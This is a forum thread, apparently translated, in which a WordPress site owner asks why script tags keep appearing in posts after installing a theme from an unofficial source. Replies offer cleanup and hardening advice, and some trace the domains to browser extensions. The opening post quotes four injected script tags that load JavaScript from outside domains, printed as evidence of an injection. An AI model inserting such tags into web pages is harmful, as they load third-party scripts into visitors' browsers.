In general, I committed a sin by downloading the theme from a certain website (I frequently download themes from there and there were no issues before). Lately, when I edit previously published entries, I noticed that a code appears in the text. This code always appears at the end of the text and is enclosed in script tags. I only noticed it when I switched to the text editor mode.
Here is the code that is added:
<script src="//s3.amazonaws.com/js-cache/145f309ae16975ba1c.js"></script>
<script src="http://netanalitics.space/addons/lnkr5.min.js" type="text/javascript"></script>
<script src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51859x5215x&r=47" type="text/javascript"></script>
<script src="http://eluxer.net/code?id=105&subid=51859_5215_" type="text/javascript"></script>
This code appears randomly on pages and posts, anywhere there is a text editor. Even the revision window in the plugin is not spared.
Sometimes the code is not there yet, sometimes it's already there, and sometimes there are four paragraphs of this nonsense at once. I manually clean them periodically.
I have checked the site with multiple antivirus programs, but they find nothing. I have also searched for the code in the content, but found nothing. Searching for the string "base64" also yielded no results. There were a few files, but they are unrelated.
There are no other users besides me, and even the editors confirm that no changes were made after me.
To be honest, I don't know what else to do. How can I locate this code and delete it?
By the way, it is harmful to visitors. On some sites (as seen in Yandex screenshots), errors with the same domains started appearing in my console. It seems like it has the ability to access cookies or cache.
1) Conduct a search based on the content of the "eval" function,
2) Attempt to comment out the JavaScript files individually, until you identify the one that loads them (although it's not guaranteed that it is a JavaScript file).
Finding the source of unwanted code injections can be a challenging task. It may involve examining the website's JavaScript files, analyzing the code for any potential vulnerabilities, and checking server logs for any suspicious activity. Additionally, regularly updating and securing your website's plugins and themes can help prevent such issues in the future.
Recently, I encountered a situation where I accidentally noticed the presence of "eluxer.net" in the console. It turns out that this was caused by a plugin I had installed on Firefox for downloading music to Facebook.
Therefore, if anyone else is using this plugin, it might be worth considering disabling it. To be honest, I wouldn't have noticed this issue if it weren't for the 404 errors appearing in the console.
It's important to regularly inspect and monitor the console for any unexpected errors or suspicious activities, as they can provide valuable insights into potential issues with plugins or scripts on your website.
The issue I encountered was caused by a specific Chrome browser extension called EQ - Audio Equalizer, which acts as a sound mixer.
To troubleshoot, I followed the poke method by sequentially disabling extensions and refreshing pages, while monitoring the console for any suspicious script downloads that could be related to this potential virus.
I wish everyone good luck in resolving similar issues and hope that my experience can be helpful. It's crucial to stay vigilant and regularly check extensions and their impact on browser performance and security.
Some advice on how to locate and remove suspicious code from your website. However, please note that I am not an expert in website security, so it's always a good idea to consult with a professional for more accurate guidance.
1. Backup your website: Before making any changes, ensure that you have a backup of your website. This will allow you to restore it if anything goes wrong during the removal process.
2. Update all plugins, themes, and the WordPress core: Outdated software can be vulnerable to security exploits. Ensure that you have the latest versions of all plugins, themes, and the WordPress core installed on your website.
3. Scan your website with a security plugin: Use a reputable security plugin to scan your website for malware or suspicious files. Plugins like Sucuri, Wordfence, or iThemes Security can help detect any potential issues.
4. Check your theme and plugins: If the issue only started after downloading a particular theme, it's possible that the theme contains malicious code. Disable the theme temporarily and see if the problem persists. Additionally, review all installed plugins and remove any unfamiliar or suspicious ones.
5. Review your active theme's files: If the issue is not related to a specific theme or plugin, check your active theme's files for any added code. Look for any unfamiliar code in your theme's functions.php file or other template files. You can access these files through the Appearance Editor in the WordPress admin dashboard or by connecting via FTP.
6. Audit your database: It's possible that the malicious code is stored within your WordPress database. Consider using a database cleaning plugin that can search for suspicious entries.
7. Harden your website: Implement security measures such as strong passwords, two-factor authentication, and limiting login attempts to protect your website against future attacks.
8. Consult with a professional: If you're unable to locate and remove the code on your own, or if you want an expert opinion, consider hiring a professional website security service to assist you.
Additional steps you can take to further investigate and resolve the issue:
1. Monitor server logs: Check your server logs for any suspicious activity or unusual requests. Look for any patterns or specific IP addresses that could indicate an attack or unauthorized access.
2. Scan your website externally: Use online website scanners such as Sucuri SiteCheck or VirusTotal to scan your website from an external perspective. These scanners can detect known malware or vulnerabilities that may be present on your site.
3. Search for unfamiliar files or directories: Use FTP or file manager tools provided by your hosting provider to search for any unfamiliar files or directories within your website's file structure. Suspicious files could be named randomly or disguised as legitimate system files, so be thorough in your search.
4. Malware cleanup services: If you're unable to locate and remove the malicious code on your own, consider using professional malware cleanup services. These services specialize in identifying and removing malware from websites and can provide you with detailed reports of the actions taken.
5. Change passwords and check user accounts: Reset all passwords associated with your website, including those of your administrative users, FTP accounts, database access, and hosting control panel. It's also advisable to review your user accounts for any suspicious activity or unauthorized access.
6. Update security plugins: Ensure that your security plugins are up to date with the latest definitions and features. This will help you detect and prevent future attacks.
7. Stay informed and educate yourself: Keep up with the latest security best practices for WordPress websites. Websites like the WordPress Security Blog and dedicated WordPress security forums can provide valuable information and guidance on securing your website.